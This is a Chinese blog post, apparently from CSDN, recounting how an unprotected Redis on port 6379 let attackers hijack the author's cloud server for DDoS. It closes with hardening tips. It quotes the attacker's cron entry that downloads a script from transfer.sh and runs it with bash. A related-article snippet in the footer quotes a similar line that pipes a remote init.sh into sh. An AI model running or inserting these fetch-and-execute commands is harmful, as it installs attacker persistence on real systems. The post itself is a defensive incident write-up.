记一次阿里云esc实例被黑客利用redis默认端口6379入侵变成肉鸡的悲惨经历

最新推荐文章于 2024-05-09 13:39:42 发布
最新推荐文章于 2024-05-09 13:39:42 发布
阅读量4.6k 收藏 2
点赞数
分类专栏: 感悟杂谈
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_38423798/article/details/79896225
版权

首先声明:因为刚入手实例,网站还在申请中。故只是搭建个redis集群供远程测试调用方便而已。因为机器上并没有项目和其他东西,为了方便redis使用的默认端口。最重要的是:配置文件中bind:标签并没有绑定ip,并且redis访问设置并没有设置密码,这就是悲剧的开始。

        4月10号阿里云发邮件称服务器实例通过6379端口向外发出ddos攻击,我心里猜测应该就是通过redis被黑了。登录实例发现有一个进程.gcg进程。该进程占用cpu99%。通过查找redis的aof持久化文件,发现黑客写入如下命令:

 */2 * * * * curl -s https://transfer.sh/QGpty/tmp.aXNXdOOWFw > .cmd && bash .cmd 
https://transfer.sh是一个命令行脚本自由存储下载网站,利用该操作下载并且自动安装了一些东西。最后初始化磁盘完事。
           感悟:网络安全无小事,任何的侥幸心理都不可有。对于redis的使用,尽量不要暴露在公网ip之下,并且不要使用默认端口,最好绑定可使用ip和设置密码等等。


一只奋斗的小白白
关注
  • 0
    点赞
  • 2
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
阿里云公网redis集群搭建以及java访问redis集群
04-20
总结,通过以上步骤,我们成功地在阿里云上搭建了一个公网访问的Redis集群,并利用Java进行了有效访问。注意在实际生产环境中,应考虑高可用性、安全性以及性能优化等问题,例如使用哨兵系统监控和自动故障切换,...
阿里云Redis开发规范1
08-03
阿里云Redis开发规范1主要关注键值设计、命令使用、客户端使用等方面,旨在优化Redis的使用,提高系统性能,防止潜在的问题。 1. 键值设计: - 建议使用业务名称作为前缀,避免键冲突,例如`业务名:表名:id`。 - ...
redis漏洞引发的入侵
onlyellow的博客
02-28 2747
有一台服务器莫名其妙的无法正常免密登录了,密码登录也被禁止了:只好去机房直接接上显示器检查。结果发现免密相关文件authorized_keys被修改的一塌糊涂:不是像其他木马或者病毒那样只是增加自己的免密登录信息,而是全部写成乱码形式:文件开头可以看到"REDIS0007 redis-ver3.2.8"的字样。 一开始感觉是木马故意混淆视线嫁祸redis(事后才发现是redis没有设置登录密码导
redis基础操作内容以及为什么端口号是6379-redis从入门到入坑(3)
qq_44417051的博客
08-27 505
基础知识
2024年最全【Linux】云服务器的Redis被黑_腾讯云 redis入侵(1),2024年最新绝对干货
最新发布
m0_61409125的博客
05-09 301
最近很多小伙伴找我要Linux学习资料,于是我翻箱倒柜,整理了一些优质资源,涵盖视频、电子书、PPT等共享给大家!
Redis后门植入分析报告
weixin_34416754的博客
03-08 518
唐朝实验室 · 2015/11/13 18:32唐朝实验室蜜网项目组0x00 概述redis是一款基于内存与硬盘的高性能数据库,在国内外被大型互联网企业、机构等广泛采用。但其一些安全配置经验却不如“LAMP”等成熟,所以很多国内企业、机构的redis都存在简单的空口令、弱密码等安全风险。11月10号,国外安全研究者的一份文档展示,redis在未进行有效验证,并且服务器对外开启了SSH服务的前提下,...
阿里云6379端口被攻击
qq_20786911的博客
03-23 1709
使用top命令查看cpu使用率,发现使用率达98% 分别杀掉进程和守护进程
解决腾讯云服务器存在端口(6379)对外攻击行为
m0_53078233的博客
04-13 7768
解决腾讯云服务器存在端口(6379)对外攻击行为
阿里云 Redis 开发规范
01-07
本文主要介绍在使用阿里云 Redis 的开发规范,从下面几个方面进行说明。 键值设计 命令使用 客户端使用 相关工具 通过本文的介绍可以减少使用 Redis 过程带来的问题。 一、键值设计 1、key 名设计 可读性和可管理性 ...
阿里云 专有云企业版 V3.8.1 云数据库 Redis 版 运维指南 20190910
04-07
"阿里云 专有云企业版 V3.8.1 云数据库 Redis 版 运维指南 20190910" 本资源摘要信息主要讲解了阿里云专有云企业版V3.8.1云数据库Redis版的运维指南,涵盖了法律声明、通用约定、运维工具、系统架构、产品架构等...
阿里云 专有云企业版 V3.12.0 云数据库 Redis 版 用户指南 20200622
05-23
综上所述,阿里云专有云企业版V3.12.0云数据库Redis版用户指南是一个详尽的资源,涵盖了从产品介绍到实际操作的各个方面,旨在帮助用户充分利用此云数据库服务。用户在使用过程中,应遵循文档的指导,并时刻关注阿里...
苍了个天,一次Linux(被黑客)入侵......
<sdffdsfsdfdfs>sfsfsfsdfsdffds</sdfsDS>Fsd
10-22 285
Python实战社群Java实战社群长按识别下方二维码,按需求添加扫码关注添加客服进Python社群▲扫码关注添加客服进Java社群▲来源丨网络安全编程与黑客程序员https://mp....
redis未授权访问漏洞利用
zkaqlaoniao的博客
11-16 283
对之前使用nmap扫描到的80端口进行访问,发现了一个页面,判断存在web服务,尝试使用扫描工具对目录进行一个探测。探测到靶机开放了多个端口,其中存在redis服务的6379端口,开始尝试是否存在redis未授权访问漏洞。利用之前已经远程连接到的redis数据库,利用写入备份文件的方式,在这个地方可以尝试写入一句话木马。编译后的redis-cli文件存放在src目录中,将其复制到bin目录下,就可以在任意位置执行。将公钥写入到foo.txt文件中,前后使用换行,必然和其他符号连接产生其他不可预知错误。
Redis 漏洞总结
qq_41696518的博客
06-26 2978
其实漏洞的原理无外乎就2点:1. 能连接Redis,这是利用的前提。2. linux一切皆文件,要利用的服务可通过修改文件内容达成。
血的教训---入侵redis并免密登录redis所在服务器漏洞复现
guijianchouxyz的博客
11-30 845
今天就跟着我一起来入侵redis并免密登录redis所在服务器吧,废话不多说,我们直接开始吧。这是一个体系的学习步骤,当然如果基础扎实的话可以继续往下面看以下都是关联的文章,可以学习下。
录第一次云服务器redis被黑
m0_73520938的博客
04-24 216
redis里莫名奇妙被写入四个键值对,backup1,backup2,backup3,backup4,内容是奇奇怪怪的sh脚本:*/5 * * * * root wd1 -q -O- http://45.83.123.29/cleanfda/init.sh | sh。施展百度大法后发现原来被挖矿了.....(redis明明设置了密码.....)解决办法:设置更复杂的redis连接密码,安全组,防火墙。
一次Redis入侵(被黑)处理过程
nelson的博客
05-22 3251
通常作为一名后端程序员,并没有系统的学习过关于服务器安防相关的知识,遇到服务器被黑的情况往往比较迷茫,不知道从何下手。服务器可能遭受的攻击多种多样,以下主要讲述的是我本次遇到的一次服务器被黑客拿来当矿机的处理过程。 攻击的发现 之所以发现服务器被攻击了是因为有用户反馈系统卡顿非常严重,我知道一般用户反馈描述的那个时间点不应该会有这么高的延迟的,所以就登录服务器查看以下CPU等资源的消耗情况。(挖矿...
Redis服务入侵
一枚小白的分享,不喜勿喷~
08-22 854
百度百科:Redis(Remote Dictionary Server),即远程字典服务,是一个开源的使用ANSI C语言编写、支持网络、可基于内存亦可持久化的日志型、Key-Value数据库,并提供多种语言的API。Redis因配置不当可导致攻击者直接获取到服务器的权限。利用条件:redis以root身份运行,未授权访问,弱口令或者口令泄露等。
Redis系列漏洞总结
NLost
10-21 6250
未授权访问;redis写入webshell;redis写入ssh公钥登录;写入计划任务反弹shell;主从复制rce;什么是主从复制;ssrf+redis写入webshell;Redis Lua 沙盒绕过rce
阿里云 专有云企业版 V3.12.0 云数据库 Redis 版 开发指南 20200702
05-23
阿里云专有云企业版V3.12.0云数据库Redis版开发指南,发布于2020年07月02日,是针对该产品版本的技术文档,旨在帮助用户更好地理解和利用阿里云提供的云数据库Redis服务。本指南涉及了重要的法律声明,确保用户在...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值